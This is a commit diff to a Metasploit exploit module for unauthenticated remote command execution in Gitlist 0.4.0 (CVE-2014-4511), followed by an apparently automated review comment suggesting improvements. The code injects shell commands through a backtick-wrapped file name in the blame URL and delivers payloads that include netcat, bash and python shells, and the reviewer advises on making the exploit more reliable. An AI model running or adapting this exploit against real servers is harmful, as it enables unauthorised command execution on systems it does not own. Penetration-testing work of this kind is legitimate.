Clean code

bug/bundler_fix
jvazquez-r7 2014-07-04 16:40:16 -05:00
parent a33a6dc79d
commit 59881323b9
1 changed files with 45 additions and 26 deletions


@ -12,10 +12,11 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlist Unauthenticated Command Execution',
'Name' => 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist.
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
@ -23,24 +24,24 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
'Author' =>
[
'@dronesec', #discovery/poc
'drone', #discovery/poc by @dronesec
'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'],
['EDB', '33929']
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
],
'Payload' =>
{
'Space' => 9999, #arbitrary, length of GET request really
'BadChars' => "&\x20",
'Space' => 8192, # max length of GET request really
'BadChars' => "&\x20",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>
@ -58,43 +59,61 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
repo = get_repo
res = send_command("echo${IFS}" + chk + "|base64${IFS}--decode")
if res && res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
if repo.nil?
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")
if res && res.body
if res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
elsif res.body.to_s =~ /sh.*not found/
return Exploit::CheckCode::Vulnerable
end
end
Exploit::CheckCode::Safe
end
def exploit
send_command(payload.encoded)
repo = get_repo
if repo.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
end
send_command(repo, payload.encoded)
end
def send_command(cmd)
def get_repo
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
'uri' => normalize_uri(target_uri.path, "/")
})
unless res
fail_with("Server did not respond in an expected way")
return nil
end
first = /href="\/gitlist\/(.*)\/"/.match(res.body)
first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)
unless first && first.length >= 2
fail_with("We don't have a properly configured Gitlist installation")
unless first_repo && first_repo.length >= 2
return nil
end
first = first[1]
repo_name = first_repo[1]
repo_name
end
def send_command(repo, cmd)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, first, 'blame', 'master', '""`' + cmd + '`')
})
'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
}, 1)
return res
res
end
end
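Review bot: In `check`, a nil response falls through to `Exploit::CheckCode::Safe`, so a target that does not answer at all — including one that only exceeds the 1-second timeout `send_command` now passes as the second argument to `send_request_cgi` — is reported as not vulnerable instead of undetermined; the `if res && res.body` guard should return Unknown first, e.g. `return Exploit::CheckCode::Unknown unless res && res.body`. The `/sh.*not found/` branch appears intentional (the injected command ran but `base64` is not on the box) and deserves a one-line comment saying so, because as written it reads like an error being mistaken for success. Separately, the `get_repo` regex hard-codes `/gitlist/` while the request itself is built from `target_uri.path`, so an instance mounted at any other path yields nil and `exploit` stops with "Failed to retrieve the remote repository"; deriving the pattern from the configured path and capturing with `([^"\/]+)` instead of the greedy `(.*)` would make repo discovery match the request that follows.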